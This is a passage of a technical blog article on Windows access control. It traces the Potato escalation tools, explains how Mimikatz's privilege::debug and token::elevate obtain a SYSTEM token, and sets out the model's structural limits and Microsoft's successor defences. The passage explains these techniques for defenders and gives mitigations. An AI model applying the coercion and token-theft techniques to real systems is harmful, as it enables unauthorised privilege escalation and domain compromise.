&lt;p&gt;&lt;strong&gt;RemotePotato0 (Cocomazzi and Pierini, 2021)&lt;/strong&gt; [@github-antoniococo-remotepotato0]. The first Potato to escape the local machine. A cross-session DCOM activation lets the attacker reach a token from a &lt;em&gt;different&lt;/em&gt; logged-on user; a cross-protocol RPC-to-LDAP relay then turns that user&apos;s authentication into a domain-administrator action against Active Directory.&lt;/p&gt;
&lt;p&gt;The README is candid about the shape of the response: &quot;UPDATE 21-10-2022: The main exploit scenario RPC-&amp;gt;LDAP of RemotePotato0 has been fixed... Just another &apos;Won&apos;t Fix&apos; Windows Privilege Escalation from User to Domain Admin. RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin... It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine&quot; [@github-antoniococo-remotepotato0]. &lt;em&gt;Just another &quot;Won&apos;t Fix&quot; Windows Privilege Escalation&lt;/em&gt; is the precise framing: the underlying primitive is structural, the 2022 fix addressed the specific RPC-to-LDAP path, and the construction continues to work for other relay targets.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PetitPotam (Lionel Gilles / topotam77, July 2021)&lt;/strong&gt; [@github-topotam-petitpotam, @nvd-cve-2021-36942]. Not strictly a local-LPE Potato, but the source of the EFSRPC coercion primitive that local-LPE Potatoes consume. PetitPotam exploits the Encrypting File System remote-procedure-call protocol&apos;s &lt;code&gt;EfsRpcOpenFileRaw&lt;/code&gt; (and several other functions) to coerce a Windows host to authenticate to an attacker-controlled endpoint.&lt;/p&gt;
&lt;p&gt;The README is exact about the interface choices: &quot;PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions :) The tools use the LSARPC named pipe with inteface c681d488-d850-11d0-8c52-00c04fd90f7e because it&apos;s more prevalent. But it&apos;s possible to trigger with the EFSRPC named pipe and interface df1941c5-fe89-4e79-bf10-463657acf44d&quot; [@github-topotam-petitpotam]. PetitPotam&apos;s most-cited use case is cross-machine relay against Active Directory Certificate Services, but the EFSRPC coercion is also locally consumable.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SharpEfsPotato (bugch3ck, 2021)&lt;/strong&gt; [@github-bugch3ck-sharpefspotato]. The local-machine variant of the PetitPotam coercion. The README is precise about lineage: &quot;Local privilege escalation from SeImpersonatePrivilege using EfsRpc. Built from SweetPotato by &lt;code&gt;@_EthicalChaos_&lt;/code&gt; and SharpSystemTriggers/SharpEfsTrigger by &lt;code&gt;@cube0x0&lt;/code&gt;&quot; [@github-bugch3ck-sharpefspotato]. SharpEfsPotato uses &lt;code&gt;EfsRpcOpenFileRaw&lt;/code&gt; against the local LSARPC pipe to coerce SYSTEM to authenticate to a local endpoint, then performs the by-now-familiar token capture and &lt;code&gt;CreateProcessAsUser&lt;/code&gt;.This article&apos;s stage-4 source verification corrected an attribution that had been carried forward from the original scope file: SharpEfsPotato&apos;s canonical repository is &lt;code&gt;bugch3ck/SharpEfsPotato&lt;/code&gt;, not the often-cited &lt;code&gt;ly4k/SharpEfsPotato&lt;/code&gt;. The latter URL returns HTTP 404. Cross-references that point at the &lt;code&gt;ly4k&lt;/code&gt; URL should be updated to point at &lt;code&gt;bugch3ck&lt;/code&gt; [@github-bugch3ck-sharpefspotato].&lt;/p&gt;
&lt;p&gt;The pattern across the lineage is that &lt;em&gt;the mitigation that did break a tool was always specific&lt;/em&gt; (the loopback-OXID restriction, the cross-session DCOM partial fix, the EFSRPC coercion partial mitigation in KB5005413), and &lt;em&gt;the mitigation that would break the family is structural&lt;/em&gt; (remove &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; from service accounts, end NTLM-to-self-as-machine relay, retire the bearer-credential property of tokens). Microsoft has shipped the first kind of fix seven times across the lineage and continues to ship them; the second kind requires architectural changes that arrive in successor articles in this series.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Author(s)&lt;/th&gt;
&lt;th&gt;Coercion vector&lt;/th&gt;
&lt;th&gt;Mitigation that broke it&lt;/th&gt;
&lt;th&gt;Mitigation that did not&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Hot Potato&lt;/td&gt;
&lt;td&gt;2016&lt;/td&gt;
&lt;td&gt;Breen&lt;/td&gt;
&lt;td&gt;NBT-NS + WPAD + HTTP-to-SMB relay&lt;/td&gt;
&lt;td&gt;Disable WPAD; KB3146965&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonate&lt;/code&gt; on services&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rotten Potato&lt;/td&gt;
&lt;td&gt;2016&lt;/td&gt;
&lt;td&gt;Breen, Mallz&lt;/td&gt;
&lt;td&gt;DCOM &lt;code&gt;CoGetInstanceFromIStorage&lt;/code&gt; (BITS)&lt;/td&gt;
&lt;td&gt;(none specific until Juicy fix)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonate&lt;/code&gt; on services&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Juicy Potato&lt;/td&gt;
&lt;td&gt;2018&lt;/td&gt;
&lt;td&gt;decoder_it, ohpe&lt;/td&gt;
&lt;td&gt;DCOM CLSID brute-list, configurable port&lt;/td&gt;
&lt;td&gt;Loopback-OXID restriction (1809 / 2019)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonate&lt;/code&gt; on services&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rogue Potato&lt;/td&gt;
&lt;td&gt;2020&lt;/td&gt;
&lt;td&gt;Cocomazzi, Pierini&lt;/td&gt;
&lt;td&gt;Remote OXID resolver via &lt;code&gt;socat&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cross-session DCOM partial fix&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonate&lt;/code&gt; on services&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PrintSpoofer&lt;/td&gt;
&lt;td&gt;2020&lt;/td&gt;
&lt;td&gt;Labro&lt;/td&gt;
&lt;td&gt;Spooler RPC + named-pipe path bypass&lt;/td&gt;
&lt;td&gt;KB5005010 (PrintNightmare-era spooler hardening) [@nvd-cve-2021-34527]&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonate&lt;/code&gt; on services&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RemotePotato0&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;Cocomazzi, Pierini&lt;/td&gt;
&lt;td&gt;Cross-session DCOM + RPC-to-LDAP relay&lt;/td&gt;
&lt;td&gt;RPC-to-LDAP relay fix (October 2022)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonate&lt;/code&gt; on services; remaining relay targets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PetitPotam&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;Gilles&lt;/td&gt;
&lt;td&gt;EFSRPC coercion via LSARPC&lt;/td&gt;
&lt;td&gt;KB5005413 partial; ADCS hardening [@nvd-cve-2021-36942]&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonate&lt;/code&gt; on services; other relay targets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SharpEfsPotato&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;bugch3ck&lt;/td&gt;
&lt;td&gt;Local EFSRPC coercion&lt;/td&gt;
&lt;td&gt;(none specific to local variant)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonate&lt;/code&gt; on services&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Eight tools. One privilege. Every &quot;mitigation that did not&quot; cell points at the same thing: a bearer-token model plus &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; on a service account.&lt;/p&gt;

Eight tools in six years against the same underlying primitive is not a tooling coincidence. It is the empirical signature of the bearer-credential property and the omnipresent service-account `SeImpersonate` privilege. The Hot Potato post&apos;s verbatim &quot;hard to fix without breaking backward compatibility&quot; admission [@foxglove-hot-potato-blog] is the same argument Microsoft eventually formalised in the security-servicing-criteria position: this surface is intentionally retained for compatibility, and structural changes belong in a different architecture. The article earns the bridge to the Adminless and NTLMless successors here, six years before the calendar gets there.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A service account holding &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; plus &lt;em&gt;any&lt;/em&gt; RPC interface that authenticates to attacker-controllable endpoints equals SYSTEM. Eight Potatoes in six years prove this is structural, not a tooling fad. Audit every server: any non-LocalSystem-equivalent process holding &lt;code&gt;SeImpersonate&lt;/code&gt; or &lt;code&gt;SeAssignPrimaryToken&lt;/code&gt; should be treated as a Potato target until proven otherwise. Pre-deploy per-service SIDs and Group Managed Service Accounts where possible to constrain the blast radius [@github-itm4n-printspoofer].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Eight Potatoes prove the bearer-token property is unkillable by point fixes. But what does an attacker who is &lt;em&gt;already admin&lt;/em&gt; do? The answer is the most-cited offensive Windows tool of the past fifteen years.&lt;/p&gt;
&lt;h2&gt;11. Mimikatz, Conditional ACEs, and the Edges of the Model&lt;/h2&gt;
&lt;p&gt;May 2011. Benjamin Delpy releases the first version of Mimikatz [@en-wiki-mimikatz]. Wikipedia&apos;s biographical summary is precise: &quot;He released the first version of the software in May 2011 as closed source software&quot; [@en-wiki-mimikatz]. Fifteen years later, every offensive Windows engagement on Earth still reaches for it.&lt;/p&gt;
&lt;p&gt;Mimikatz contains many modules. Two of them sit directly on the access-control surface and are worth naming explicitly. The repository&apos;s own command surface lists them as &lt;code&gt;privilege::debug&lt;/code&gt; and &lt;code&gt;token::elevate&lt;/code&gt; [@github-gentilkiwi-mimikatz].&lt;/p&gt;
&lt;p&gt;&lt;code&gt;privilege::debug&lt;/code&gt; is one line of code: the command enables &lt;code&gt;SeDebugPrivilege&lt;/code&gt; on the caller&apos;s token. Any local administrator on stock Windows holds the privilege on the token by default; the command flips it from &lt;code&gt;Available&lt;/code&gt; to &lt;code&gt;Enabled&lt;/code&gt; via &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt;. With &lt;code&gt;SeDebugPrivilege&lt;/code&gt; enabled, the calling process can &lt;code&gt;OpenProcess&lt;/code&gt; against most processes on the machine, including SYSTEM-level services such as &lt;code&gt;lsass.exe&lt;/code&gt; (Protected Process Light targets are the exception). Every Mimikatz session that wants to read process memory begins with &lt;code&gt;privilege::debug&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;token::elevate&lt;/code&gt; is three lines of code in spirit. The command opens a SYSTEM-owned process (typically &lt;code&gt;lsass.exe&lt;/code&gt;), calls &lt;code&gt;OpenProcessToken&lt;/code&gt; to retrieve a handle to the SYSTEM token, calls &lt;code&gt;DuplicateTokenEx&lt;/code&gt; to duplicate the handle for impersonation, and calls &lt;code&gt;SetThreadToken&lt;/code&gt; to attach the duplicated SYSTEM token to the calling thread. The thread is now SYSTEM. The bearer-token property in three lines of code.&lt;/p&gt;
&lt;p&gt;This article does not cover &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt;. That command is the most-cited Mimikatz capability in journalism (it reads cached credentials from &lt;code&gt;lsass.exe&lt;/code&gt;), but the credential-storage surface and the Credential Guard mitigation belong to the &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Secure Kernel sibling article&lt;/a&gt; in this series [@secure-kernel-sibling]. For the purposes of &lt;em&gt;this&lt;/em&gt; article, the lesson stops at &lt;code&gt;token::elevate&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The lesson is the structural concession. With administrator rights on the local machine and &lt;code&gt;SeDebugPrivilege&lt;/code&gt; enabled, the access-control model has &lt;em&gt;no defence&lt;/em&gt; for &quot;I will pretend to be a different process,&quot; because admin equals kernel by Microsoft&apos;s own boundary definition [@msrc-servicing-criteria]. The DACL evaluation algorithm does not protect against a caller who can read and write arbitrary kernel memory. The privilege list does not protect against a caller who can rewrite the privilege check. The integrity check does not protect against a caller who can edit the integrity label. Every primitive in the model is, by construction, defenceless against an attacker who has crossed the boundary the model considers itself responsible for defending.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; With administrator rights and &lt;code&gt;SeDebugPrivilege&lt;/code&gt;, the Windows access-control model has no defence for &quot;I will pretend to be a different process,&quot; because admin equals kernel by Microsoft&apos;s own boundary definition. Mimikatz &lt;code&gt;token::elevate&lt;/code&gt; is the canonical demonstration. The structural fix for &lt;em&gt;selected&lt;/em&gt; secrets is Credential Guard, which moves the secret out of the NT kernel&apos;s address space entirely. See the Secure Kernel sibling article for the architecture [@secure-kernel-sibling, @msrc-servicing-criteria].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The model has been extended in only one structural direction since 1993, and that direction is the &lt;em&gt;subject&lt;/em&gt; of the access matrix. &lt;em&gt;Conditional ACEs&lt;/em&gt; and &lt;em&gt;Dynamic Access Control&lt;/em&gt; (DAC) shipped together in Windows Server 2012 and Windows 8 [@ms-learn-dac]. They are the only extension of the access-matrix subject Microsoft has shipped in thirty-three years.&lt;/p&gt;
&lt;p&gt;The mechanism is twofold. First, ACEs gain an expression syntax. The SDDL ACE strings page documents &lt;code&gt;XA&lt;/code&gt;, &lt;code&gt;XD&lt;/code&gt;, &lt;code&gt;XU&lt;/code&gt;, and &lt;code&gt;ZA&lt;/code&gt; as conditional callback variants of the basic allow / deny / audit / object-allow ACE types [@ms-learn-ace-strings]. A conditional ACE carries an expression in addition to a SID and an access mask, and the kernel evaluates the expression against the token&apos;s claims at access time. The canonical example is &lt;code&gt;(XA;;FA;;;AU;(@User.Department==&quot;Finance&quot;))&lt;/code&gt; -- an allow-callback ACE that grants &lt;code&gt;FILE_ALL_ACCESS&lt;/code&gt; to Authenticated Users &lt;em&gt;if&lt;/em&gt; the token carries a &lt;code&gt;Department&lt;/code&gt; claim equal to &lt;code&gt;&quot;Finance&quot;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Second, the token gains &lt;em&gt;claims&lt;/em&gt;. A claim is a typed key-value pair attached to the token by Active Directory at logon. Claims can be sourced from the user&apos;s AD attributes, the device&apos;s AD attributes, or resource properties on the object. Microsoft Learn states the role they play: &quot;A central access rule is an expression of authorization rules that can include one or more conditions involving user groups, user claims, device claims, and resource properties. Multiple central access rules can be combined into a central access policy&quot; [@ms-learn-dac].&lt;/p&gt;
&lt;p&gt;A &lt;em&gt;Central Access Policy&lt;/em&gt; (CAP) is a set of &lt;em&gt;Central Access Rules&lt;/em&gt; (CARs), each of which is a conditional-ACE expression. The CAP is applied to file shares; the file-share metadata says &quot;evaluate this CAP for every access,&quot; and the CAP&apos;s expressions reference token claims. The DAC scenario guidance enumerates the deployment-side primitives -- automatic and manual file classification, central access policies for safety-net authorisation, central audit policies for compliance reporting, and Rights Management Service encryption for data-in-use protection [@ms-learn-dac-scenario].&lt;/p&gt;
&lt;p&gt;The reason DAC has not displaced classic DAC outside file-server scenarios is in the same Microsoft Learn page: &quot;Dynamic Access Control is not supported in Windows operating systems prior to Windows Server 2012 and Windows 8. When Dynamic Access Control is configured in environments with supported and non-supported versions of Windows, only the supported versions will implement the changes&quot; [@ms-learn-dac]. Heterogeneous environments fall back to classic DAC. Airgapped environments without a claims-enabled AD DS (a Server 2012+ KDC issuing claims in the Kerberos PAC) have no claims to evaluate. Conditional ACEs are a real extension of the model&apos;s subject dimension; they are also a real bet that the AD-and-Kerberos plane is healthy enough to evaluate them on every access.AppContainer&apos;s Package SIDs (Windows 8) and conditional ACEs (Server 2012) shipped the same year. Both extend the &lt;em&gt;subject&lt;/em&gt; dimension of the access matrix -- one with code identity, one with attribute claims. Neither closes the kernel-equals-admin gap. The two extensions are coordinate, not stacked: a conditional ACE can reference a Package SID; a Package SID can be the subject of a conditional ACE [@ms-learn-dac, @app-identity-sibling].&lt;/p&gt;
&lt;p&gt;The model has been extended in two coordinate dimensions in thirty-three years. It has not been replaced. So what does the whole thing look like put together -- and what does it actually fail at?&lt;/p&gt;
&lt;h2&gt;12. The 2026 Plane: Ten Primitives, One Decision&lt;/h2&gt;
&lt;p&gt;Run a single &lt;code&gt;OpenObject&lt;/code&gt; call on a Windows 11 machine and walk the kernel&apos;s path. Every primitive the article has introduced fires for that one call.&lt;/p&gt;

flowchart LR
    A[User-mode caller] --&amp;gt;|OpenObject name, DesiredAccess, Token| B[Object Manager]
    B --&amp;gt;|Resolve name in namespace| C[Namespace lookup]
    C --&amp;gt;|Fetch security descriptor| D[Object header SD]
    D --&amp;gt; E[SeAccessCheck]
    E --&amp;gt; F[Generic-to-specific mapping]
    F --&amp;gt; G[Mandatory Integrity Control check]
    G --&amp;gt;|Pass| H[AppContainer / capability check]
    H --&amp;gt; I[Privilege bypass: SeBackup / SeRestore / SeDebug]
    I --&amp;gt; J[DACL walk in canonical order]
    J --&amp;gt; K[Conditional ACE expression evaluation]
    K --&amp;gt; L[GrantedAccess accumulated]
    L --&amp;gt; M[SACL audit ACE emit if matched]
    M --&amp;gt; N[Return HANDLE or STATUS_ACCESS_DENIED]
&lt;p&gt;The diagram is the article in one figure. Read it left to right. Every box is a primitive named in Sections 3 to 11. Every famous Windows escalation tool of the last twenty-five years targets one of those boxes:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Section introduced&lt;/th&gt;
&lt;th&gt;Year shipped&lt;/th&gt;
&lt;th&gt;Canonical primary citation&lt;/th&gt;
&lt;th&gt;Canonical attack&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Security Reference Monitor&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1993&lt;/td&gt;
&lt;td&gt;[@ms-learn-access-control]&lt;/td&gt;
&lt;td&gt;(Underlying surface; not directly attacked)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Security Identifier (SID)&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;1993&lt;/td&gt;
&lt;td&gt;[@ms-learn-security-identifiers]&lt;/td&gt;
&lt;td&gt;Misused well-known SIDs (&quot;Everyone is just a SID&quot;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Access Token&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;1993&lt;/td&gt;
&lt;td&gt;[@ms-learn-access-tokens]&lt;/td&gt;
&lt;td&gt;The Potato lineage; Mimikatz &lt;code&gt;token::elevate&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Security Descriptor&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1993&lt;/td&gt;
&lt;td&gt;[@ms-learn-how-dacls-control-access]&lt;/td&gt;
&lt;td&gt;HiveNightmare (CVE-2021-36934)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;DACL + ACE&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;1993&lt;/td&gt;
&lt;td&gt;[@ms-learn-how-dacls-control-access, @ms-learn-order-of-aces]&lt;/td&gt;
&lt;td&gt;NULL DACL misconfigurations; out-of-order ACEs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;SACL + audit&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1993&lt;/td&gt;
&lt;td&gt;[@ms-learn-access-control]&lt;/td&gt;
&lt;td&gt;Tools that copy DACL but not SACL silently drop integrity labels&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Privilege&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;1993&lt;/td&gt;
&lt;td&gt;[@ms-learn-privileges]&lt;/td&gt;
&lt;td&gt;Mimikatz &lt;code&gt;privilege::debug&lt;/code&gt;; &lt;code&gt;SeBackup&lt;/code&gt; abuse&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Mandatory Integrity Control&lt;/td&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;2007&lt;/td&gt;
&lt;td&gt;[@ms-learn-mic]&lt;/td&gt;
&lt;td&gt;IE7 Protected Mode broker bypasses&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;UAC split-token&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;2007&lt;/td&gt;
&lt;td&gt;[@ms-learn-uac]&lt;/td&gt;
&lt;td&gt;UACMe: 70+ AutoElevate-redirect methods [@github-hfiref0x-uacme]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Conditional ACE / DAC&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;2012&lt;/td&gt;
&lt;td&gt;[@ms-learn-dac, @ms-learn-ace-strings]&lt;/td&gt;
&lt;td&gt;Falls back to classic DAC in heterogeneous environments&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Windows access-control model is one decision plane, not a feature catalogue. Every securable Windows operation resolves through &lt;code&gt;SeAccessCheck&lt;/code&gt; against five fixed inputs. Every famous escalation tool of the last twenty-five years attacks one of those inputs. Recognising the model as a single plane is the key to using its vocabulary against any specific attack.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The plane is whole. It is also full of structural holes its own keepers have publicly admitted. What are they?&lt;/p&gt;
&lt;h2&gt;13. The Five Structural Limits&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s &lt;em&gt;Security Servicing Criteria for Windows&lt;/em&gt; defines a security boundary as &quot;a logical separation between the code and data of security domains with different levels of trust... the separation between kernel mode and user mode is a classic [...] security boundary&quot; [@msrc-servicing-criteria]. The criteria document then enumerates which boundaries Microsoft commits to servicing. The kernel-mode / user-mode boundary qualifies. UAC and admin-to-kernel are not in the enumerated list. Once that admission is on the public record, the model&apos;s structural arc becomes legible. Five derived limits flow from the concession.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 1: Admin equals kernel.&lt;/strong&gt; Any compromise with administrator rights can rewrite the model&apos;s own enforcement code. &lt;em&gt;Consequence:&lt;/em&gt; Mimikatz, every kernel-driver-loading attack, every signed-driver bring-your-own-vulnerable-driver path. &lt;em&gt;Successor:&lt;/em&gt; VBS Trustlets, which host secrets and policy enforcement in the &lt;em&gt;Virtual Trust Level 1&lt;/em&gt; user-mode environment that the VTL0 NT kernel cannot read or modify. Detailed coverage belongs to the Secure Kernel sibling article in this series [@secure-kernel-sibling].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 2: Tokens are bearer credentials.&lt;/strong&gt; Whichever process holds the handle gets the rights. The kernel does not ask how the handle was obtained. &lt;em&gt;Consequence:&lt;/em&gt; the entire Potato lineage (eight tools, six years), Mimikatz &lt;code&gt;token::elevate&lt;/code&gt;, every cross-session token-theft attack. &lt;em&gt;Successor:&lt;/em&gt; Adminless / Administrator Protection, which retires the long-lived filtered/full token pair in favour of a fresh, time-limited, just-in-time elevation flow gated by Windows Hello plus a hidden, system-generated, profile-separated user account that issues an isolated admin token [@ms-learn-administrator-protection, @techcommunity-admin-protection]. The forthcoming Adminless article in this series will cover the architecture in detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 3: &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; on every service account.&lt;/strong&gt; IIS, SQL Server, the Print Spooler, scheduled tasks, Docker, Citrix, almost every managed-service account by default. &lt;em&gt;Consequence:&lt;/em&gt; every Potato, by construction. &lt;em&gt;Partial successor today:&lt;/em&gt; per-service SIDs and Group Managed Service Accounts let administrators constrain the blast radius of a compromised service. &lt;em&gt;Structural successor:&lt;/em&gt; Adminless, which removes the privilege from the daily authentication path and demands a fresh elevation per privileged action [@ms-learn-administrator-protection, @techcommunity-admin-protection].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 4: NTLM relay surface.&lt;/strong&gt; As long as Windows services accept NTLM and the operating system signs NTLM challenges with the local-machine credential, the local-NTLM-to-self attack is structurally available. &lt;em&gt;Consequence:&lt;/em&gt; PetitPotam, RemotePotato0, every cross-protocol relay. &lt;em&gt;Successor:&lt;/em&gt; NTLMless, which formally retires NTLM as a default Windows authentication protocol [@techcommunity-windows-auth-evolution]. The on-ramp is the NTLM auditing channel introduced in Windows 11 24H2 and Windows Server 2025 (KB5064479, original publish date July 11, 2025), which records NTLMv1 usage in &lt;code&gt;Microsoft\Windows\NTLM\Operational&lt;/code&gt; and gives administrators a per-workload deprecation telemetry [@ms-support-ntlm-auditing]. The forthcoming NTLMless article in this series will cover the architecture in detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 5: The DACL is local.&lt;/strong&gt; Conditional ACEs and Dynamic Access Control claims need a claims-enabled AD DS (a Server 2012+ KDC issuing claims in the Kerberos PAC) to evaluate, with AD FS required only for cross-forest or federated claims; airgapped or heterogeneous environments fall back to user / group SIDs as the only available subject. &lt;em&gt;Consequence:&lt;/em&gt; the access-matrix subject is, in practice, still &quot;user and group&quot; for most non-file-server workloads. The 2012 extension to claims and code identity is real but operationally bounded.&lt;/p&gt;
&lt;p&gt;The deepest of the five limits is the one Norm Hardy named in 1988. Hardy&apos;s framing returned in Section 2 [@en-wiki-confused-deputy] holds: capability systems close the gap structurally; ACL engineering does not.&lt;/p&gt;
&lt;p&gt;seL4 closes it with machine-checked correctness proofs and a capability-based design that makes ambient authority a category error [@en-wiki-capability-based-security]. Windows closes it, when it closes it at all, with VBS Trustlets that move &lt;em&gt;the right to perform the operation&lt;/em&gt; into a separate execution domain. The Potato lineage is the textbook confused-deputy instance: a service running with &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is the privileged compiler; the attacker is the user holding a billing-records-shaped pointer; the service uses &lt;em&gt;its own&lt;/em&gt; authority on every authentication it accepts.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Hardy&apos;s 1988 paper [@wayback-cap-lore-hardy] and the Wikipedia summary [@en-wiki-confused-deputy] both say the same thing: ACL systems are structurally vulnerable to confused-deputy attacks; capability systems are not. The gap is not asymptotic. ACL engineering does not close it. The Potato lineage is what the gap looks like in the field, repeated against eight different coercion primitives over six years.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; &lt;strong&gt;The next generation of Windows defences cannot live inside the kernel, because the kernel is on the wrong side of the boundary the model draws.&lt;/strong&gt; Microsoft&apos;s own servicing criteria admit it. Adminless, NTLMless, VBS Trustlets, and Credential Guard are the four non-overlapping ways to fix it. Each successor was scoped to close a specific gap the access-control model could not.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The five limits are named. The successors are shipping. What replaces what?&lt;/p&gt;
&lt;h2&gt;14. The Successors: Adminless, NTLMless, VBS Trustlets, Credential Guard&lt;/h2&gt;
&lt;p&gt;One paragraph each. This section is a forward-reference index, not a detailed walk-through.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Adminless.&lt;/strong&gt; Removes the local Administrators group from the daily authentication path. The long-lived filtered / full token pair the UAC model produces at logon is replaced with a fresh, time-limited, just-in-time elevation flow: when a user wants to perform a privileged action, the system gates the action behind &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello&lt;/a&gt; plus a hidden, system-generated, profile-separated user account that issues an isolated admin token, and the resulting token is bounded in time and scope [@ms-learn-administrator-protection].&lt;/p&gt;
&lt;p&gt;The Microsoft Tech Community announcement (modified November 19, 2024) summarises the security argument: &quot;By requiring explicit authorization for every administrative task, Administrator protection protects Windows from accidental changes by users and changes by malware... Malicious software often relies on admin privileges to change device settings and execute harmful actions. Administrator protection breaks the attack kill chain&quot; [@techcommunity-admin-protection]. &lt;em&gt;Closes:&lt;/em&gt; limits #2 and #3 -- there is no long-lived bearer credential to steal, and &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; does not need to live on every service account because services run as bounded principals issued capabilities at the moment of need. Forthcoming article in this series.&lt;/p&gt;
